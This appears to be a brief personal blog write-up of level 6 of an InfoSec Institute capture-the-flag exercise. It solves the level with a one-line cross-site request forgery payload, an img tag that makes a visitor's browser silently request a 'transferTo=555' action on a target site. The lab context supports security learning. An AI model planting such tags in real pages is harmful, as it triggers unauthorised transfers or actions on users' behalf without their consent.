Link: http://ctf.infosecinstitute.com/ctf2/exercises/ex6.php
Visiting level 6 brings us to the page that you see below
The task description is uses some tag allowed to want users browsers to load that page and execute the query string transferTo with the number 555 as a parameter
That’s easy task, just put:
<img src="http://site.com/transferTo=555">
Done!
Nhat Truong Blog 